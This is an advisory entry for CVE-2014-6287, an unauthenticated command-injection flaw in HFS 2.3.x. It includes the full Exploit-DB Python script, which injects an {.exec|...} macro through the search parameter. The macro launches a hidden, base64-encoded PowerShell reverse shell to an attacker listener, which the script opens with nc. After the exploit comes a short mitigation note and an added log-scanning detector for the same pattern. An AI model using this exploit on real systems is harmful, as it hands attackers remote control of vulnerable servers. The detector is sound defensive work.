Vendor: HFS (HTTP File Server)
Author: Pergyz
CVSS: 9.8 (CRITICAL)
Type: Remote Command Execution
CWE: 78
Product Name: HFS (HTTP File Server)
Affected Version From: 2.3
Affected Version To: 2.3.x
Patch Exists: YES
Related CVE: CVE-2014-6287
CPE: cpe:2.3
Tags: packetstorm,msf,cve,cve2014,hfs,rce,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:2124459909', 'verified': True, 'vendor': 'rejetto', 'product': 'http_file_server'}
Platforms Tested: Microsoft Windows Server 2012 R2 Standard
Year: 2021

HFS (HTTP File Server) 2.3.x – Remote Command Execution (3)

CVE-2014-6287 lets a remote, unauthenticated attacker execute arbitrary commands on a system running HFS (HTTP File Server) version 2.3.x. The vulnerability exists because HFS does not properly handle user input in the search query parameter: as the script below shows, a value consisting of a null byte (%00) followed by an HFS scripting macro such as {.exec|...} reaches the server's macro handling, so the attacker can inject commands. Injected commands run with the privileges of the HFS application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of HFS (HTTP File Server) and ensure that input validation and sanitization mechanisms are implemented properly.

Exploit-DB raw data:

# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

#!/usr/bin/python3

import base64
import os
import urllib.request
import urllib.parse

lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80

# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'

# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")

# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")

# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)

# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
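
The request built by the script above has a distinctive shape in web or proxy access logs: a search parameter whose decoded value holds a null byte followed by an HFS macro opener such as {.exec|, usually carrying a PowerShell -EncodedCommand blob. The detection script below is an added example, not part of the Exploit-DB entry; the combined log format, the sample lines (constructed, with a harmless encoded command) and all function names are assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Feb/2021:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Feb/2021:10:00:05 +0000] "GET /?search=%00{.exec%7Cpowershell.exe'
    '+-NoProfile+-EncodedCommand+RwBlAHQALQBEAGEAdABlAA%3D%3D.} HTTP/1.1" 200 512',
    '10.0.0.7 - - [20/Feb/2021:10:00:09 +0000] "GET /docs/?search=%7B.notes.%7D HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Decoded search value: NUL byte, then an HFS macro opener "{.name|".
MACRO_RE = re.compile(r"\x00\s*\{\.\s*(\w+)\s*\|")
# PowerShell -EncodedCommand (or -e/-ec/-enc...) followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def inspect_line(line):
    """Return a finding dict for an HFS macro injection in ?search=, else None."""
    request = REQUEST_RE.search(line)
    if not request:
        return None
    query = urlsplit(request.group(1)).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        macro = MACRO_RE.search(value) if key.lower() == "search" else None
        if not macro:
            continue
        finding = {"macro": macro.group(1).lower(), "decoded_command": None}
        blob = ENCODED_RE.search(value)
        if blob:  # recover the PowerShell text for triage
            try:
                raw = base64.b64decode(blob.group(1))
                finding["decoded_command"] = raw.decode("utf-16le")
            except ValueError:  # bad base64 or bad UTF-16
                finding["decoded_command"] = "<undecodable>"
        return finding
    return None

def scan(lines):
    """Return (client_ip, finding) pairs for every suspicious line."""
    pairs = ((line.split(" ", 1)[0], inspect_line(line)) for line in lines)
    return [(ip, finding) for ip, finding in pairs if finding]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Any hit on a host running HFS 2.3.x should be treated as a likely compromise, and the decoded command gives responders the callback address or follow-on action to pivot on.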